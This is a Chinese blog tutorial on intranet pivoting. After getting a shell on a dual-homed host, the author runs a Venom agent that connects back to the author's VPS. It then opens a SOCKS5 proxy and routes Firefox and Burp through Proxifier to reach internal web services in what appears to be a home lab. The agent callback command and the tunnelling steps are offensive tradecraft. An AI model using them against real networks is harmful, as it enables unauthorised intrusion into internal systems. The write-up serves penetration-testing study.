利用Venom+Proxifier来实现内网流量代理

0X00 前言

一直以来都想学内网但是emm我太懒了,最近看到了微信公众号酒仙桥第六部队的文章,文章真的是写的太好了!索性就以此来开始内网学习的过程吧

文章链接:https://mp.weixin.qq.com/s/CZyGa4_oxgfI7RBbN-qAnw

image-20200611141826237

当我们Getshell的时候,有的主机很有可能有两张网卡一张网卡连接着外网另外一张网卡连接着内网,在渗透过程中遇到内网肯定得尝试一下,通常情况下内网的防护做的是比较薄弱的,虽然我们getshell的这台服务器是可以连接内网的但是我们的这个服务器上啥工具都没有蛮难顶的,所以我们需要把这台服务器当作一个跳板,利用venom搭建代理,走socks5协议直接把内网的全部流量都代理出来。

0X01 工具

这里使用的工具是Venom,当然能达到同样效果的还有reGeorg和EarthWorm

我们这里要利用Venom来搭建代理,利用socks5协议将流量全部代理到我们的本地电脑上

工具链接:https://github.com/Dliv3/Venom/releases

上面的这个链接里面有着编译好的工具,我们下载下来直接运行就可以了

Venom工具是有admin端和agent端

事先我们需要准备一台VPS,将Venom工具分别下载到我们自己的VPS和受害主机上

0X02 实验环境

受害主机:Windows Server 内网中运行着phpstudy模拟内网中运行的web服务,ip:47.*.*.130 , 内网ip 172.18.*.148

VPS: Ubuntu 134.*.*.40

本地:Macos 15.05

工具:Venom,Proxifier

0X03 使用

配置Venom

首先在自己的VPS上启动Venom admin端

Venom提供了各个版本,根据自己本机情况使用即可

image-20200611143305456

./admin_linux_x86 -lport 9999

image-20200611143207421

运行成功就会如上图所示

在受害机Windows Server 上启动Venom agent端

./agent.exe -rhost 134.*.*.40 -rport 9999

image-20200611150753992

执行成功之后我们的vps上就会接受到信息

image-20200611144432020

可以看到新的节点已经连接到我们的admin节点了

在Venom中我们可以通过help来查看命令提示

show 查看节点

goto 节点名 前往节点

建立连接之后我们使用goto 1进入目前被控windows机器的节点

image-20200611144635275

根据Venom的帮助提示我们可以知道在Venom中可以非常方便的建立一个socks5 代理服务器

image-20200611144750408

命令行执行 socks 端口 端口自行选择

image-20200611150853561

可以看到我们成功的启动了socks服务

配置Proxifier

接下来结合Proxifier软件来连接我们的代理服务器,按下图进行操作

image-20200611145352473

这时我们应成功创建了,接下来进入rules进行修改

这里有个坑,之前直接localhost代理但是出现报错

No connection could be made because the target machine actively refused it

后面尝试对特定应用进行加代理就可以了,这里我添加的是火狐浏览器+burp,当然添加可以根据自己的情况进行改动

然后在action中选中之前设置的代理

image-20200611145646971

然后就OK了

火狐浏览器登陆 ,发现ip已经变成了我们服务器的ip

image-20200611151125409

访问http://172.18.219.148/index.html

成功访问到内网中的web服务

image-20200611145953261

burp也可以抓到包

image-20200611150240430

访问内网中的测试文件test.php 同样可以成功抓包

image-20200611150604368

这样我们就可以利用我们getshell的主机作为跳板,直接访问内网资源了!

参考文章:https://www.k0rz3n.com/2018/07/06/%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8reGeorg+Proxifier%E6%B8%97%E9%80%8F%E5%86%85%E7%BD%91/

发表评论

电子邮件地址不会被公开。 必填项已用*标注